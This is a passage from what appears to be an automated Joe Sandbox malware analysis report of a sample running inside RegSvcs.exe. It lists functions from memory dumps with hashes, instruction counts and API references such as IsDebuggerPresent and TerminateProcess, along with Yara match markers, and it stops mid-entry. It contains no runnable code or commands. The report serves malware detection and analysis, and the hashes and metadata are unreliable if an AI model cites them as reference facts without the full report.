Instruction ID: e010d2ab3f6faf68bd1d063cd1e14540d30951b47b934ebc82d892d702f9eba9
Opcode Fuzzy Hash: 1e830128af082aea0cc5f4dfa88fba4a4c9e2772eefa25ee99f5206504a13dda
Instruction Fuzzy Hash: 68115974A055089BCB04DFA8E884ABDBBB5FB88304F548165EA04E7642EB34A841CF61

Function 050F6920 Relevance: .1, Instructions: 60COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2905520760.00000000050F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_50f0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 06a81929f819abb94f488e53aee3a9884a5e6dec74972fde0350ba1020022854
Instruction ID: 7d47e67ccb81d3466f3f5adfe0e67532f412f0c3b24e6ad8d395342cf3d28007
Opcode Fuzzy Hash: 06a81929f819abb94f488e53aee3a9884a5e6dec74972fde0350ba1020022854
Instruction Fuzzy Hash: 3A119E363042008FD7549A25E949FAA77EAEF86710F14416DE249CF762CA66E808C751

Function 050F6948 Relevance: .1, Instructions: 60COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2905520760.00000000050F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_50f0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f66a191d040b884430ffdcb120849d3f300b30be2bff4c4f66c76ffedff8023c
Instruction ID: 9555612196b1921b6a90a6647fd2d5bef43ffce56ce5bacfbfc555f45298b84c
Opcode Fuzzy Hash: f66a191d040b884430ffdcb120849d3f300b30be2bff4c4f66c76ffedff8023c
Instruction Fuzzy Hash: 34114F753042048FC754DB69E548E6AB7FAFF89721B11846DE24ACF761CA72EC04CB50

Function 050F0C41 Relevance: .1, Instructions: 59COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2905520760.00000000050F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_50f0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d8eda1f2d8f1a456a0daf06e58ae740aa192a96f5aa8ad460ad9ed9a74b0e54c
Instruction ID: f4c0e0c14edcf7dd5e587a2e2d25ade3b9d8f36e850879bd6b29f12d65232e01
Opcode Fuzzy Hash: d8eda1f2d8f1a456a0daf06e58ae740aa192a96f5aa8ad460ad9ed9a74b0e54c
Instruction Fuzzy Hash: 2221E074D4021A8FCB44EFA8D9496EEBBF1EB18300F10522AD805F3250EB305A99CBA1

Function 0277D333 Relevance: .1, Instructions: 57COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2901433433.000000000277D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0277D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_277d000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4c7f8b7e770ae4cd2155b9e62d57b008416f11b96e0295358949b824588ba942
Instruction ID: a3cd145acec89f4778bb90a557603ae7e5e410684f2577dc1d1c7e4f7519ae80
Opcode Fuzzy Hash: 4c7f8b7e770ae4cd2155b9e62d57b008416f11b96e0295358949b824588ba942
Instruction Fuzzy Hash: 84218C76504244DFCF16CF10D9C4B16BF62FB88314F28C5AADD490A656C33AD42ACBA1

Function 0277D5FB Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2901433433.000000000277D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0277D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_277d000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: db79b5eb69be54bde6d22b58705b80061de706f1e28455fb2d9027648eeca995
Instruction ID: c27268bfadd0caba63ed738d98b0ac4f8fac5ac4af4319899d90702233835fa3
Opcode Fuzzy Hash: db79b5eb69be54bde6d22b58705b80061de706f1e28455fb2d9027648eeca995
Instruction Fuzzy Hash: 5411AF76504284CFCF16CF10D5C4B16BF62FB84314F24C5A9D8494B256C336D46ACBA1

Function 050F6F09 Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2905520760.00000000050F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_50f0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: de348b7185377d11130bd58887e56f42866ca53a65c75258286d5572548f3048
Instruction ID: 540ff4d1958260a398732074a8d0da0b7cb267f92cf8c5d3468af2797dc62348
Opcode Fuzzy Hash: de348b7185377d11130bd58887e56f42866ca53a65c75258286d5572548f3048
Instruction Fuzzy Hash: EE117371E002159FCB54EFB8E4556AEBBF2AB88390B144539E609E7600EB329C458791

Function 050F56F0 Relevance: .0, Instructions: 47COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2905520760.00000000050F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_50f0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 77ae9e711eed7d56a561b6240a90010fae21160005e242ff29063e425469a69a
Instruction ID: 0ab55cf49bb5456862f497d78ec649d91e50868acf403ec7e22980f868595be9
Opcode Fuzzy Hash: 77ae9e711eed7d56a561b6240a90010fae21160005e242ff29063e425469a69a
Instruction Fuzzy Hash: 8C018072D0060C9FCB249F68FD88AAE7BB5FB48350F044529F95A92641DB309925CB90

Function 050F5700 Relevance: .0, Instructions: 46COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2905520760.00000000050F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_50f0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 90e0b6feca2e6c547a66a56a2afb167292063b40265f1a13f731553dd3321e9e
Instruction ID: b45f0e3ec5333cc5d5d7b02d3877b6ad2bb7bbe92a3ac4e2dbfadf40fd9320c2
Opcode Fuzzy Hash: 90e0b6feca2e6c547a66a56a2afb167292063b40265f1a13f731553dd3321e9e
Instruction Fuzzy Hash: 33014C35E1021DDFCB649F79ED48AAE7FB9FF88350F004429E91A97280DF3099108BA1

Function 0277D01D Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2901433433.000000000277D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0277D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_277d000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a074f5b9f05545f5f08e7ccefbd21f01a9e87eb2ce3efc8d1a334c84c273baef
Instruction ID: f3b6ef352fc7e2ddcccf4d631a9a17b998e1ca8dc41d4e38237837fe0b82fb02
Opcode Fuzzy Hash: a074f5b9f05545f5f08e7ccefbd21f01a9e87eb2ce3efc8d1a334c84c273baef
Instruction Fuzzy Hash: 1601D6715083409EEF308A29CE84B67BFDCEF45328F18C56AED495B286C379D845CAB1

Function 0277D007 Relevance: .0, Instructions: 44COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2901433433.000000000277D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0277D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_277d000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fe1343e5a76d8b0fd9cf197dd3febee874057ef6ebb13eed54e96f65a4cbdc09
Instruction ID: 2ea8edf8fa6d59b7f32b82ea76a2795b99cfd61bf8daea9e96d6eac4b38390dc
Opcode Fuzzy Hash: fe1343e5a76d8b0fd9cf197dd3febee874057ef6ebb13eed54e96f65a4cbdc09
Instruction Fuzzy Hash: D301527100D3C05ED7124B258894B52BFB4DF57224F1DC5DBD9888F1A3C3695849C772

Function 050F6CF8 Relevance: .0, Instructions: 44COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2905520760.00000000050F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_50f0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8a33c52c748d682b1b25a4602e432ec6e6f29abd8e722057bd066135e8becfad
Instruction ID: a176817fdc72a165610ce0882ed1b7b2f6772e5c6a8f6707f1075d5f8487590a
Opcode Fuzzy Hash: 8a33c52c748d682b1b25a4602e432ec6e6f29abd8e722057bd066135e8becfad
Instruction Fuzzy Hash: 3CF021367103145BCB092678A9095AD7FEEFBC5310F144025F70ACB741CE39CD128355

Function 050F0C28 Relevance: .0, Instructions: 39COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2905520760.00000000050F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_50f0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 637bf7cdff833fe91d45e73db27a1ec352e0cfeef7e2474f22869515640ca307
Instruction ID: 68acb480f2d7089306ee42dbe9a7acd7b478128e74fadd476a1ea8d1f629e38c
Opcode Fuzzy Hash: 637bf7cdff833fe91d45e73db27a1ec352e0cfeef7e2474f22869515640ca307
Instruction Fuzzy Hash: 8F012974C142598FCB11EFA8D9545EDBFF0FF09314F10066AD946BB650EB305994CB91

Function 050F6FB0 Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2905520760.00000000050F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_50f0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8bb999bf2b9c22cc20404a58fb3b693d3253b148853b86e06b5eec5400be9000
Instruction ID: 27180ed254c49c910b6965ee2fec30f1a7b5c477b63d718cd078a12f74cb7eae
Opcode Fuzzy Hash: 8bb999bf2b9c22cc20404a58fb3b693d3253b148853b86e06b5eec5400be9000
Instruction Fuzzy Hash: BBF02032B046259BCB19976AF0089AEB7EAEFC4270B04007AF209CB750CE32CC028790

Function 050F6C98 Relevance: .0, Instructions: 33COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2905520760.00000000050F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_50f0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 752db234cdd7d17cd9dfc876761be117a19e2f224a33949890d00b53fc97a410
Instruction ID: 19ad1f1d36542551eb6bbe9ed967c54b799629fd956ebda3547bed81a2aba207
Opcode Fuzzy Hash: 752db234cdd7d17cd9dfc876761be117a19e2f224a33949890d00b53fc97a410
Instruction Fuzzy Hash: A9F05E35300505DFC700CF69D484C6ABBEAFF88724B544069FA098B331CB719C11CB80

Function 050F67E0 Relevance: .0, Instructions: 33COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2905520760.00000000050F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_50f0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3b057116a4c2f79cbe3fc2573d7c3f7a9aaf48e09378c1d222aabd17b35e7f27
Instruction ID: 5315258a3252a5aa84263a4e79e76591c55abd51ca5b50dfc70231b0ecccadba
Opcode Fuzzy Hash: 3b057116a4c2f79cbe3fc2573d7c3f7a9aaf48e09378c1d222aabd17b35e7f27
Instruction Fuzzy Hash: AAF09072A002049FCB91DFB9D9419AFBBF6FF48250710453AD609E3611E7309A15CBE1

Function 050F67F0 Relevance: .0, Instructions: 31COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2905520760.00000000050F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_50f0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 325f2f556362ce0c22fd2971fbbb8cd315fb312678adfddc743684dfe9334596
Instruction ID: 19c04007e7f5d67679decad32b54c3a9e2a72a7a90231a82741722ef1d8e955b
Opcode Fuzzy Hash: 325f2f556362ce0c22fd2971fbbb8cd315fb312678adfddc743684dfe9334596
Instruction Fuzzy Hash: E1F089729002089F8B50DFADD84499FFBF9FB982507404136D609D3611D7709A158BE1

Function 050F6FFA Relevance: .0, Instructions: 30COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2905520760.00000000050F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_50f0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2a8e631be5508288dd8f74f1acf09474dbcd6d061b34fcccf8eb926a7718e8ee
Instruction ID: 1f96d0d2cf68f9c71767367d89da8ab9a9e98c8945570260f9bec5da7250eb30
Opcode Fuzzy Hash: 2a8e631be5508288dd8f74f1acf09474dbcd6d061b34fcccf8eb926a7718e8ee
Instruction Fuzzy Hash: 15E06D363041109FC708EB69F549EDCB7B9EF48361B0441AAF60ADBB21CF22E9008B44

Function 050F0E4C Relevance: .0, Instructions: 29COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2905520760.00000000050F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_50f0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 44952375c791486780146ea76555cc81fc91e0e4bcc170607e17a6f980790b44
Instruction ID: 69539a90d233c9ee210d0dcfa6e726950d1685e92446cddaed11afda7f079437
Opcode Fuzzy Hash: 44952375c791486780146ea76555cc81fc91e0e4bcc170607e17a6f980790b44
Instruction Fuzzy Hash: 66E068B970460CD9CB34EA78B8004EF775DF989170320471EC52B970D1EC26591783D2

Function 050F0D00 Relevance: .0, Instructions: 25COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2905520760.00000000050F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_50f0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 90fed814437746996f8dbdedbda2f577817a3c021326bed55bac4fe68eacae72
Instruction ID: 35e54e2729336551e159cf038a0617febd3615abe7672ba3a4909a1ed101e47e
Opcode Fuzzy Hash: 90fed814437746996f8dbdedbda2f577817a3c021326bed55bac4fe68eacae72
Instruction Fuzzy Hash: 9BE08031D1033B67C710B665DD066DFB734DF91714F84C211D45872141EF30675A8591

Function 050F3E18 Relevance: .0, Instructions: 25COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2905520760.00000000050F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_50f0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d88cbaa5b9fceee3842a8f3ac02e6a2d26ae2af51e3e38427f20b909147755e5
Instruction ID: 90a77ad097d527e467f8536e54afd37974027c29802c5a1b92ba6a1ec52da327
Opcode Fuzzy Hash: d88cbaa5b9fceee3842a8f3ac02e6a2d26ae2af51e3e38427f20b909147755e5
Instruction Fuzzy Hash: C2E002308B56078BD2642F64B6BC37A7AA8FF1F313B426F14B60E914519F70406CCA75

Function 050F0D10 Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2905520760.00000000050F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_50f0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7675493bb004c046418953eb7c12d2da7f2736fa76ddd65198bb162f25ce073b
Instruction ID: 38500f3bade9f6392afe9a83f925e0f025d31839c3fe1b8d4446b912d8b1d3f2
Opcode Fuzzy Hash: 7675493bb004c046418953eb7c12d2da7f2736fa76ddd65198bb162f25ce073b
Instruction Fuzzy Hash: 72D01231D2022A578B00AAA5DC044EEB738EE95665B504626D55437140EB70665986A2

Function 050FE6A8 Relevance: .0, Instructions: 17COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2905520760.00000000050F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_50f0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1d0f384dc7338d7ce6a1a381013b79932c8e16e56ff9b47c6eda43ec615e6a6b
Instruction ID: 0a6a50754eecc2b9f02a2064de7de360bda0143f9c2e8be687bec087caf4bf13
Opcode Fuzzy Hash: 1d0f384dc7338d7ce6a1a381013b79932c8e16e56ff9b47c6eda43ec615e6a6b
Instruction Fuzzy Hash: F8E0ED30E0915CCFCB68DB14D91866D73B6FB48281F1005E5D10B1A6A8CBB46DC4CF41

Non-executed Functions

Function 0040CE09 Relevance: 7.6, APIs: 5, Instructions: 58COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32 ref: 004136F4
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00413709
UnhandledExceptionFilter.KERNEL32(0041FB80), ref: 00413714
GetCurrentProcess.KERNEL32(C0000409), ref: 00413730
TerminateProcess.KERNEL32(00000000), ref: 00413737

Memory Dump Source

Source File: 00000007.00000002.2900256489.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.2900256489.0000000000426000.00000040.80000000.00040000.00000000.sdmpDownload File
Associated: 00000007.00000002.2900256489.0000000000436000.00000040.80000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_RegSvcs.jbxd

Yara matches

Similarity

API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
String ID:
API String ID: 2579439406-0
Opcode ID: 8d1f5aed7c5dfd20079dd4d946f02ab3c4db913f1b194ab0176bc05653236347
Instruction ID: 93bf0ba95bc2a0faef8203f21c221f33afe887fd41373e09ae0fa508b254143b
Opcode Fuzzy Hash: 8d1f5aed7c5dfd20079dd4d946f02ab3c4db913f1b194ab0176bc05653236347
Instruction Fuzzy Hash: A521C3B4601204EFD720DF65E94A6457FB4FB08356F80407AE50887772E7B86682CF4D

Function 00408C60 Relevance: 2.9, Strings: 2, Instructions: 377COMMON

Download Yara Rule

Strings

@, xrefs: 00409092
@, xrefs: 00408D03

Memory Dump Source

Source File: 00000007.00000002.2900256489.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.2900256489.0000000000426000.00000040.80000000.00040000.00000000.sdmpDownload File
Associated: 00000007.00000002.2900256489.0000000000436000.00000040.80000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_RegSvcs.jbxd

Yara matches

Similarity

API ID:
String ID: @$@
API String ID: 0-149943524
Opcode ID: 524773d1bc2011db47f0014430bcd25baf081f96639b8f8b2c6f9a821cea509b
Instruction ID: 284407f43597d2b1529aa5dbb826e4f49811f0ea4eaa41d9cabafce47d44ff82
Opcode Fuzzy Hash: 524773d1bc2011db47f0014430bcd25baf081f96639b8f8b2c6f9a821cea509b
Instruction Fuzzy Hash: 64E159316083418FC724DF28C58066BB7E1AFD9314F14493EE8C5A7391EB79D949CB8A

Function 0040ADB0 Relevance: 2.5, APIs: 2, Instructions: 23memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 0040ADD0
HeapFree.KERNEL32(00000000,00000000,00000000), ref: 0040ADE1

Memory Dump Source

Source File: 00000007.00000002.2900256489.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.2900256489.0000000000426000.00000040.80000000.00040000.00000000.sdmpDownload File
Associated: 00000007.00000002.2900256489.0000000000436000.00000040.80000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_RegSvcs.jbxd

Yara matches

Similarity

API ID: Heap$FreeProcess
String ID:
API String ID: 3859560861-0
Opcode ID: 97be969a41baf58eb72298c462d2c401217e5b830f10c891868ac5f2a1a85b43
Instruction ID: 72dd180cd7110ee49b406fd12918c6a771032a3efea8c67e715e4993f3fed615
Opcode Fuzzy Hash: 97be969a41baf58eb72298c462d2c401217e5b830f10c891868ac5f2a1a85b43
Instruction Fuzzy Hash: 54E09A312003009FC320AB61DC08FA337AAEF88311F04C829E55A936A0DB78EC42CB58

Function 050F83EB Relevance: 1.8, Strings: 1, Instructions: 589COMMON

Download Yara Rule

Strings

B, xrefs: 050F9F8E

Memory Dump Source

Source File: 00000007.00000002.2905520760.00000000050F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_50f0000_RegSvcs.jbxd

Similarity

API ID:
String ID: B
API String ID: 0-1255198513
Opcode ID: 2ca1d61c44cd519fae393cb59dbd37142f329ecdd2267007adcb5ae48c8afa2c
Instruction ID: f93c4dfcbe6bd1f1ab8e29a1a6592e90584cb94ad657a4c2bf267a03f1308bec
Opcode Fuzzy Hash: 2ca1d61c44cd519fae393cb59dbd37142f329ecdd2267007adcb5ae48c8afa2c
Instruction Fuzzy Hash: BD52D431C10B5A8EDB11EF68C854AA9F7B1FF95300F15D6DAE44867221EB70AAD4CF81

Function 050FAEA8 Relevance: 1.6, Strings: 1, Instructions: 367COMMON

Download Yara Rule

Strings

", xrefs: 050FB3C6

Memory Dump Source

Source File: 00000007.00000002.2905520760.00000000050F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_50f0000_RegSvcs.jbxd

Similarity

API ID:
String ID: "
API String ID: 0-123907689
Opcode ID: 51594c02a60bba52e00fcfbb56e5b2f133a12a25a6a01aad0f4e836faf3adf21
Instruction ID: 9bc3ffd2c35dd6619297c29122028d9ac2c1f5c6185742c391b823e84ddc5108
Opcode Fuzzy Hash: 51594c02a60bba52e00fcfbb56e5b2f133a12a25a6a01aad0f4e836faf3adf21
Instruction Fuzzy Hash: A8F10770E002488FDB14CFA9E4947ADBBF2BF88314F24D169E508AB795D7749985CF50

Function 004123F1 Relevance: 1.5, APIs: 1, Instructions: 4COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(Function_000123AF), ref: 004123F6

Memory Dump Source

Source File: 00000007.00000002.2900256489.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.2900256489.0000000000426000.00000040.80000000.00040000.00000000.sdmpDownload File
Associated: 00000007.00000002.2900256489.0000000000436000.00000040.80000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_RegSvcs.jbxd

Yara matches

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 4924e8eeaf860e2c76ee0bfea96ab0c911441afc8f12962253436aa9ca0899ee
Instruction ID: 17be93bd3878235df00445469c4c747c8dbd7a907b9f456768254b9c32cbcc1b
Opcode Fuzzy Hash: 4924e8eeaf860e2c76ee0bfea96ab0c911441afc8f12962253436aa9ca0899ee
Instruction Fuzzy Hash: CA900270661144D7865017705D0968669949B4C6427618471653DD4098DBAA40505569

Function 029311A4 Relevance: 1.4, Strings: 1, Instructions: 160COMMON

Download Yara Rule

Strings

4'^q, xrefs: 02931280

Memory Dump Source

Source File: 00000007.00000002.2902088694.0000000002930000.00000040.00000800.00020000.00000000.sdmp, Offset: 02930000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_2930000_RegSvcs.jbxd

Similarity

API ID:
String ID: 4'^q
API String ID: 0-1614139903
Opcode ID: e1e541cc697c72612760aba5932447b04b84d38016bad34d9fc5a9235cfb8fec
Instruction ID: 45bf559793447eb450c51cf3b4ee25093adbc89a2722d68c391a79c9a90dcb02
Opcode Fuzzy Hash: e1e541cc697c72612760aba5932447b04b84d38016bad34d9fc5a9235cfb8fec
Instruction Fuzzy Hash: B5610B71E512458FDB49DF7AE98079ABBF3AB85300F04C629D009AB368DF706C49CB51

Function 029311A8 Relevance: 1.4, Strings: 1, Instructions: 160COMMON

Download Yara Rule

Strings

4'^q, xrefs: 02931280

Memory Dump Source

Source File: 00000007.00000002.2902088694.0000000002930000.00000040.00000800.00020000.00000000.sdmp, Offset: 02930000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_2930000_RegSvcs.jbxd

Similarity

API ID:
String ID: 4'^q
API String ID: 0-1614139903
Opcode ID: 1f5b388e5d080e60f664c42ae0563f07e2f4231953ded51c8e859fdeeb1cb198
Instruction ID: b0fa1f5ec3ee1cb125ca3e4fceeec5692a3ab28f2609ca667f1e5b76fda2d031
Opcode Fuzzy Hash: 1f5b388e5d080e60f664c42ae0563f07e2f4231953ded51c8e859fdeeb1cb198
Instruction Fuzzy Hash: C0610C71E512498FDB09DF7AE98079ABBF3AB85300F04C629D009AB368DF706C49CB51

Function 00407C3F Relevance: .8, Instructions: 783COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2900256489.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.2900256489.0000000000426000.00000040.80000000.00040000.00000000.sdmpDownload File
Associated: 00000007.00000002.2900256489.0000000000436000.00000040.80000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_RegSvcs.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8976f0a61fc1960936828f21bd26f3318fd330ab7a4f50ce487ee3b945538f04
Instruction ID: d5e3495c9826dce769b252ea72d1bcaf7b5d46a24141b332915225fd3cdae7ad
Opcode Fuzzy Hash: 8976f0a61fc1960936828f21bd26f3318fd330ab7a4f50ce487ee3b945538f04
Instruction Fuzzy Hash: 9852A471A047129FC708CF29C99066AB7E1FF88304F044A3EE896E7B81D739E955CB95

Function 004073A0 Relevance: .6, Instructions: 633COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2900256489.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.2900256489.0000000000426000.00000040.80000000.00040000.00000000.sdmpDownload File
Associated: 00000007.00000002.2900256489.0000000000436000.00000040.80000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_RegSvcs.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 20055dc05f39624d89f9d13173d00032c9ddb5f23ed3028259e70998ae7a08b4
Instruction ID: 17d22deff8d32e931318445bbea846c6b698fa6fcc44f6923348d96d7e24b863
Opcode Fuzzy Hash: 20055dc05f39624d89f9d13173d00032c9ddb5f23ed3028259e70998ae7a08b4
Instruction Fuzzy Hash: 0A329E70A087029FD318CF29C98472AB7E1BF84304F148A3EE89567781D779E955CBDA

Function 00406CA0 Relevance: .4, Instructions: 401COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2900256489.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.2900256489.0000000000426000.00000040.80000000.00040000.00000000.sdmpDownload File
Associated: 00000007.00000002.2900256489.0000000000436000.00000040.80000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_RegSvcs.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 020392db844ceed98276714fd2150c2ad4a639f6bad3fb02a1d0621011a6745a
Instruction ID: cc67e10771130af0a5279b37c8f7fa75a2653c997645fd1ae8a0b8309c7f2627
Opcode Fuzzy Hash: 020392db844ceed98276714fd2150c2ad4a639f6bad3fb02a1d0621011a6745a
Instruction Fuzzy Hash: 48E1D6306083514FC708CF28C99456ABBE2EFC5304F198A7EE8D68B386D779D94ACB55

Function 064D9F09 Relevance: .3, Instructions: 329COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2907466933.00000000064D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_64d0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 68cc5ef6d4c40f6f91ef50290881e1dcf57cdbabb8b4482e1bb08203b5163092
Instruction ID: 19c88c0778d575f7c2cd07846076c4a3dba82b946ebfa449153cd41d1ed91691
Opcode Fuzzy Hash: 68cc5ef6d4c40f6f91ef50290881e1dcf57cdbabb8b4482e1bb08203b5163092
